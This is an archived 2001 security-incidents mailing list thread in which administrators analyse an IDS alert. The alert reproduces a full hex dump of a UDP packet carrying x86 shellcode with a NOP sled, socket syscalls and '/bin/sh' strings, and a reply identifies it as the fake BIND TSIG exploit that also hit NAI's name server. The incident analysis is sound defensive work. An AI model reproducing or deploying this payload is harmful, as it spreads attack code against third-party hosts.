Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Named TSIG exploit ?

From: Paul Cardon <paul () MOQUIJO COM>
Date: Mon, 5 Feb 2001 16:48:52 -0500
The source ran the fake BIND TSIG exploit released on BUGTRAQ last week
using your system as the intended target.  Pretty sad since it means
they were also (unknowingly?) attacking NAI's name server.

-paul


Mihai Moldovanu wrote:


[**] IDS362 - MISC - Shellcode X86 NOPS-UDP [**]
02/01-09:31:30.076442 0:10:7B:40:91:C0 -> 0:1:2:F7:76:B8 type:0x800
len:0x22A
141.85.31.233:1025 -> OurNameServer:53 UDP TTL:60 TOS:0x0 ID:0  DF
Len: 520
00 D0 84 00 00 01 00 00 00 00 00 01 00 CD 80 83  ................
C4 08 3D 04 00 18 01 7C 05 E8 15 00 00 00 E8 80  ..=....|........
00 00 00 E8 53 49 47 4E 41 54 55 52 45 E8 52 53  ....SIGNATURE.RS
41 00 00 EB 34 5E BB 01 00 00 00 89 F1 B8 66 00  A...4^........f.
00 00 CD 80 89 46 14 8D 46 30 89 46 18 31 C0 89  .....F..F0.F.1..
46 20 8D 46 0C 89 46 24 B8 66 00 00 00 BB 0B 00  F .F..F$.f......
00 00 8D 4E 14 CD 80 EB EF E8 C7 FF FF FF 02 00  ...N............
00 00 02 00 00 00 11 00 00 00 02 00 00 35 A1 45  .............5.E
03 96 FF FF FF FF EF FF FF FF 00 04 00 00 00 00  ................
00 00 02 5F 9A 80 10 00 00 00 2F 62 69 6E 2F 73  ..._....../bin/s
68 00 00 EB 37 5E 6A 11 6A 02 6A 02 6A 66 8D 05  h...7^j.j.j.jf..
61 00 00 00 CD 80 89 C2 6A 10 89 F0 50 31 C0 50  a.......j...P1.P
68 24 10 00 00 8D 46 0F 50 52 68 88 00 00 00 8D  h$....F.PRh.....
05 85 00 00 00 CD 80 83 C4 1C EB DC E8 C4 FF FF  ................
FF 00 02 00 35 A1 45 03 96 E8 B1 FF FF FF 2F 62  ....5.E......./b
69 6E 2F 73 68 00 00 90 90 90 90 90 90 90 90 90  in/sh...........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

The shellcode inside the second packet it's pretty strage . Anyone can
take a deeper look at it ?
Previous By Date Next
Previous By Thread Next

Current thread: